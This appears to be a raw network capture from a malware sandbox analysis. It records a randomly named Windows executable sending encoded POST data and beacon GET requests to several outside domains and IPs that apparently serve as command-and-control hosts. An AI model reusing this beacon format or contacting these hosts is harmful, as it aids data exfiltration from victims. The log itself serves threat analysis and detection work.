Nov 12, 2024 18:34:23.683288097 CET | 844 | OUT | POST /ou1g/ HTTP/1.1
                                                                                                                                                            Host: www.multileveltravel.world
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Origin: http://www.multileveltravel.world
                                                                                                                                                            Referer: http://www.multileveltravel.world/ou1g/
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Content-Length: 227
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                                            Data Ascii: mnYxMt=k4neGU5Lr/HE89govrhgN8msF1bCJ8gJS5Ux/tyI3TT111mmPp2hbXUfpmlv8N4dEAJSNagBsfzosbwHoKw4tTqfM0rs8oEzCuE4QMrcb3rh2zOVzEKz0ShwlLUmCFhTrUgTuUF1n4Gx4NhBkAsFMYmeETsYTAFc+jJbzj7pLIcnAgUNDKfT1UYuk1Or4YZ1sxPJFxSlhNAH5wjG9oL4U/lEVm32


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.8 | 49721 | 3.33.130.190 | 80 | 6320 | C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 18:34:26.393382072 CET | 1861 | OUT | POST /ou1g/ HTTP/1.1
                                                                                                                                                            Host: www.multileveltravel.world
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Origin: http://www.multileveltravel.world
                                                                                                                                                            Referer: http://www.multileveltravel.world/ou1g/
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Content-Length: 1243
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
Data Ascii: mnYxMt= [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.8 | 49722 | 3.33.130.190 | 80 | 6320 | C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 18:34:28.934596062 CET | 547 | OUT | GET /ou1g/?mnYxMt=p6P+FgoGiP/G4Ng3oYlXbImlMlvFFtomc4B14fS4wE3C00mAPriyDmdkjkAl1MwiKmR4YcU9y+Hnl6M9logr4jq6HSjjn+IbLc0VRvScSlPe00C22kG27m5w2cAUdRcq5A==&TTd=yRNPZBU8fZA HTTP/1.1
                                                                                                                                                            Host: www.multileveltravel.world
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
Nov 12, 2024 18:34:30.596894979 CET | 410 | IN | HTTP/1.1 200 OK
                                                                                                                                                            Server: openresty
                                                                                                                                                            Date: Tue, 12 Nov 2024 17:34:30 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 270
                                                                                                                                                            Connection: close
                                                                                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?mnYxMt=p6P+FgoGiP/G4Ng3oYlXbImlMlvFFtomc4B14fS4wE3C00mAPriyDmdkjkAl1MwiKmR4YcU9y+Hnl6M9logr4jq6HSjjn+IbLc0VRvScSlPe00C22kG27m5w2cAUdRcq5A==&TTd=yRNPZBU8fZA"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.8 | 49747 | 206.119.82.134 | 80 | 6320 | C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 18:34:36.419838905 CET | 785 | OUT | POST /xqel/ HTTP/1.1
                                                                                                                                                            Host: www.40wxd.top
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Origin: http://www.40wxd.top
                                                                                                                                                            Referer: http://www.40wxd.top/xqel/
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Content-Length: 207
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                                            Data Ascii: mnYxMt=itCjE0xz2xkITn0X3Rrot4bwHhb9YAuL0cX8ssprr/ca87QAEKog1W/WNQB3S7ekiVbTFXBFh+l2Fx84SG+RRBMzbA5gCzMe0LczXD3RFUWw/i630Hyez5MFFxq+An29T7+Tx1ZOply09oTwkwIq/d6Q50oPze3tglLGQU03Td2xEbE91+4BMBtx7Q/Mjib29P0qLE0=
Nov 12, 2024 18:34:37.356420994 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                            Server: nginx
                                                                                                                                                            Date: Tue, 12 Nov 2024 17:34:37 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 548
                                                                                                                                                            Connection: close
                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.8 | 49762 | 206.119.82.134 | 80 | 6320 | C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 18:34:38.971611977 CET | 805 | OUT | POST /xqel/ HTTP/1.1
                                                                                                                                                            Host: www.40wxd.top
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Origin: http://www.40wxd.top
                                                                                                                                                            Referer: http://www.40wxd.top/xqel/
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Content-Length: 227
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                                            Data Ascii: mnYxMt=itCjE0xz2xkISGEXk2Ho9ob/MBb9SgvC0cb8stt7oN4a9bAAWYAggW/WYgB2YbetiVfhFWtFh+h2FwM4T1WQTRMxRQ5mMTMe0LczXDzrFUOw/SK37GydtJMGSBq+XX2hT7+xxxQjpnK09sfwkhIlxd7VnEod+/2cu3b0R1MNNNmwBtpXvcwHPBFa7TX6mVGenskaVThesyL526hrrWXRwfOaRCQt
Nov 12, 2024 18:34:40.719484091 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                            Server: nginx
                                                                                                                                                            Date: Tue, 12 Nov 2024 17:34:39 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 548
                                                                                                                                                            Connection: close
                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 12, 2024 18:34:40.727097034 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                            Server: nginx
                                                                                                                                                            Date: Tue, 12 Nov 2024 17:34:39 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 548
                                                                                                                                                            Connection: close
                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.8 | 49770 | 206.119.82.134 | 80 | 6320 | C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 18:34:41.521265984 CET | 1822 | OUT | POST /xqel/ HTTP/1.1
                                                                                                                                                            Host: www.40wxd.top
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Origin: http://www.40wxd.top
                                                                                                                                                            Referer: http://www.40wxd.top/xqel/
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Content-Length: 1243
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
Data Ascii: mnYxMt= [TRUNCATED]
Nov 12, 2024 18:34:42.465552092 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                            Server: nginx
                                                                                                                                                            Date: Tue, 12 Nov 2024 17:34:42 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 548
                                                                                                                                                            Connection: close
                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.8 | 49783 | 206.119.82.134 | 80 | 6320 | C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 18:34:44.060735941 CET | 534 | OUT | GET /xqel/?TTd=yRNPZBU8fZA&mnYxMt=vvqDHEJ83RQMdUhg1EKNs//bEg71XT6q1sb91PtModI/1ZQDQosT/W6HQ09vXqzqrFP7Qh9498xTBzMpQmH7Ki9HalpMd1Ir/+EzHBu1DH6h7lGA7WG3xqwFFB+pHyvvKg== HTTP/1.1
                                                                                                                                                            Host: www.40wxd.top
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
Nov 12, 2024 18:34:45.337590933 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                            Server: nginx
                                                                                                                                                            Date: Tue, 12 Nov 2024 17:34:44 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 548
                                                                                                                                                            Connection: close
                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.8 | 49806 | 162.213.249.216 | 80 | 6320 | C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 18:34:50.563554049 CET | 791 | OUT | POST /rhgo/ HTTP/1.1
                                                                                                                                                            Host: www.vasehub.xyz
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Origin: http://www.vasehub.xyz
                                                                                                                                                            Referer: http://www.vasehub.xyz/rhgo/
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Content-Length: 207
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                                            Data Ascii: mnYxMt=4zYQckirOMbOUqbHo9Di8PaK+6rzVg3TqjVeYGCnFRPaKlVBzF7JdzDRZFgQQoD/cTqRgKHZdFXjCc6ffo1Q5BukdhV63lDzPjRtGXkCvDFiK8rViddjlWd11LhxFQp9UxxYELHBjk7NPL9DckbbyONA802ZCy8lGlmBNY1I5baCd/JUt5rfpha6nOUAAUl7soaP8iI=
Timestamp: Nov 12, 2024 18:34:51.269753933 CET | Bytes transferred: 533 | Direction: IN | Data:
HTTP/1.1 404 Not Found
                                                                                                                                                            Date: Tue, 12 Nov 2024 17:34:51 GMT
                                                                                                                                                            Server: Apache
                                                                                                                                                            Content-Length: 389
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID: 14 | Source IP: 192.168.2.8 | Source Port: 49815 | Destination IP: 162.213.249.216 | Destination Port: 80 | PID: 6320 | Process: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
Timestamp: Nov 12, 2024 18:34:53.195826054 CET | Bytes transferred: 811 | Direction: OUT | Data:
POST /rhgo/ HTTP/1.1
                                                                                                                                                            Host: www.vasehub.xyz
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Origin: http://www.vasehub.xyz
                                                                                                                                                            Referer: http://www.vasehub.xyz/rhgo/
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Content-Length: 227
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                                            Data Ascii: mnYxMt=4zYQckirOMbOF6LHpavi5vaJxarzbA3XqjReYH2RFnXaKElB0E7JYzDRRlgReIDhcTXkgOHZdFrjCeiffbdP2xumSBV8q1DzPjRtGUZnvDdiKNbVj/5g7Gd6yLhxSApxUxw9EIDrjmDNPKNDNRvY7ONC403LHwd5eFigJbRrwJKEYJk+3bjZqhyRnN82Fj4T2LK/i1cngXRo6jKMZDY1V0Zmbarq
Timestamp: Nov 12, 2024 18:34:53.882500887 CET | Bytes transferred: 533 | Direction: IN | Data:
HTTP/1.1 404 Not Found
                                                                                                                                                            Date: Tue, 12 Nov 2024 17:34:53 GMT
                                                                                                                                                            Server: Apache
                                                                                                                                                            Content-Length: 389
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID: 15 | Source IP: 192.168.2.8 | Source Port: 49822 | Destination IP: 162.213.249.216 | Destination Port: 80 | PID: 6320 | Process: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
Timestamp: Nov 12, 2024 18:34:55.916640043 CET | Bytes transferred: 1828 | Direction: OUT | Data:
POST /rhgo/ HTTP/1.1
                                                                                                                                                            Host: www.vasehub.xyz
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Origin: http://www.vasehub.xyz
                                                                                                                                                            Referer: http://www.vasehub.xyz/rhgo/
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Content-Length: 1243
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                                            Data Ascii: mnYxMt=4zYQckirOMbOF6LHpavi5vaJxarzbA3XqjReYH2RFnvaK2tB0njJbzDROVgUeICkcTPogOLvdAvjQr+fZqdPtBumQBV53lCrPjAmGUJnvDdiKOTVktdg5Gd11LhDFQokUxZAELvRjVLNMplDeHDYm+NE1U2OHwRQeFuaJa1RwLaEZ/ZWuP3muiyzo9RcFBUx8Ze0/34ZgDVDswuddR9lIwZqWs6CT4Mqiman9YyZbCWCjI8ieoLr4j7pIQKANDpWjS3gxQOz7S75pGEmNU52zUyFaHuywBWo2hzracpl7kWKv/Qy2g1pCowXtIbRw/Pk67ps7DXRfqp8mywI0apc1nOW9FhwvITYjlWxBW1a0R7IpwL0DIBO/xnTMNIUp7thdKXNC61JHiY9UxQf9lhP6nrfghKut8Po2vNSV6KSH+OGCu9viISMMZG5YWKP8pMHnbtITec4pcChxMQIeqQ/XDhtkJXapgFjSlJMEU5iR3qS0cm7KuohkJcTc54VJEjAq2/JKE3DuCLy9AzE03JxcBmQO2oPVPxpbdi7NDWZT94bEGuetOSalQjSZ3AaPu6NWGUgzcqCFnJPnfuVp6Nu1dJo1Bb8iGHHS3yOUNAuCwOMf/61NNvovxCPyBD0oxZSqhA1hXVMLHKGfR6CXtUEZ3TaHZwz9fKP4in/8+TZ+YuNf0xrcJhSzILH3QEwvigAQE3BHB2Y0MM4R2+MBvnG+QNQJ5szD+V+J1mBA22nnMX20vx11rNENzTp5pyRpiHtmIxm/8sqtsWHyBR+2gIoRI9jDzA4eZaQCPYL2wZPlSGHbeSHBmKajD8LzQ6/X1WctXJO7VAIkWZ1wlJgtUImEZ8OQUVSU/1UlQS+4QiBiEw3C5AQCKmf8hfefqYwjbLYwJvYNA5ECWuxHD4jb+yxyXHlyDanc5ueHKdWRH50Z4+LV3xujgD2dAy715w76GTRvuKIOfRh+ou5q39i4FBOEyi3DElRqueNPac9jnI8pqd4T [TRUNCATED]
Timestamp: Nov 12, 2024 18:34:56.514447927 CET | Bytes transferred: 533 | Direction: IN | Data:
HTTP/1.1 404 Not Found
                                                                                                                                                            Date: Tue, 12 Nov 2024 17:34:56 GMT
                                                                                                                                                            Server: Apache
                                                                                                                                                            Content-Length: 389
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID: 16 | Source IP: 192.168.2.8 | Source Port: 49831 | Destination IP: 162.213.249.216 | Destination Port: 80 | PID: 6320 | Process: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
Timestamp: Nov 12, 2024 18:34:58.470088959 CET | Bytes transferred: 536 | Direction: OUT | Data:
GET /rhgo/?mnYxMt=1xwwfRv/EtrSMau9mvfnqZyv+rHmSC/oq21AcW2zPWj0G3ZAwmXkdhytTHgnTqC6RVKy1Kv2PAT+a+qucbh6tCPQXm9YsirdLDRzA3cfwD9qJJnnuO9mn3dTqKhTCwV4Aw==&TTd=yRNPZBU8fZA HTTP/1.1
                                                                                                                                                            Host: www.vasehub.xyz
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
Timestamp: Nov 12, 2024 18:34:59.166017056 CET | Bytes transferred: 548 | Direction: IN | Data:
HTTP/1.1 404 Not Found
                                                                                                                                                            Date: Tue, 12 Nov 2024 17:34:59 GMT
                                                                                                                                                            Server: Apache
                                                                                                                                                            Content-Length: 389
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID: 17 | Source IP: 192.168.2.8 | Source Port: 49850 | Destination IP: 217.160.0.231 | Destination Port: 80 | PID: 6320 | Process: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
Timestamp: Nov 12, 2024 18:35:04.288039923 CET | Bytes transferred: 824 | Direction: OUT | Data:
POST /jp2s/ HTTP/1.1
                                                                                                                                                            Host: www.coffee-and-blends.info
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Origin: http://www.coffee-and-blends.info
                                                                                                                                                            Referer: http://www.coffee-and-blends.info/jp2s/
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Content-Length: 207
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                                            Data Ascii: mnYxMt=C2Cm4mvFygX4uhPE54Dr/sfkxULV5ckQfydGfuoswxGjO3wfbedpFSoi9sIHJ/L5LzcMN6hn8XklYyctd8/7z8saK4DGIf8+gOTL21WtllUhyxBKRx9KIS86Hp1MkvDFsMTH8DCEAm5mt9fMIPdD7HNDlU0uX6yBMvGIQLzDojhZRkgDxECoyye/MIbRR24l+pEgWX0=
Timestamp: Nov 12, 2024 18:35:05.120455980 CET | Bytes transferred: 779 | Direction: IN | Data:
HTTP/1.1 404 Not Found
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                            Connection: close
                                                                                                                                                            Date: Tue, 12 Nov 2024 17:35:04 GMT
                                                                                                                                                            Server: Apache
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            Content-Encoding: gzip


Session ID: 18
Source IP: 192.168.2.8
Source Port: 49860
Destination IP: 217.160.0.231
Destination Port: 80
PID: 6320
Process: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe

Timestamp: Nov 12, 2024 18:35:06.831748009 CET
Bytes transferred: 844
Direction: OUT
Data:
POST /jp2s/ HTTP/1.1
Host: www.coffee-and-blends.info
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Origin: http://www.coffee-and-blends.info
Referer: http://www.coffee-and-blends.info/jp2s/
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 227
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
Timestamp: Nov 12, 2024 18:35:07.671664000 CET
Bytes transferred: 779
Direction: IN
Data:
HTTP/1.1 404 Not Found
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Date: Tue, 12 Nov 2024 17:35:07 GMT
Server: Apache
X-Frame-Options: deny
Content-Encoding: gzip


Session ID: 19
Source IP: 192.168.2.8
Source Port: 49872
Destination IP: 217.160.0.231
Destination Port: 80
PID: 6320
Process: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe

Timestamp: Nov 12, 2024 18:35:09.619227886 CET
Bytes transferred: 1861
Direction: OUT
Data:
POST /jp2s/ HTTP/1.1
Host: www.coffee-and-blends.info
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Origin: http://www.coffee-and-blends.info
Referer: http://www.coffee-and-blends.info/jp2s/
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 1243
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
Timestamp: Nov 12, 2024 18:35:10.482788086 CET
Bytes transferred: 779
Direction: IN
Data:
HTTP/1.1 404 Not Found
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Date: Tue, 12 Nov 2024 17:35:10 GMT
Server: Apache
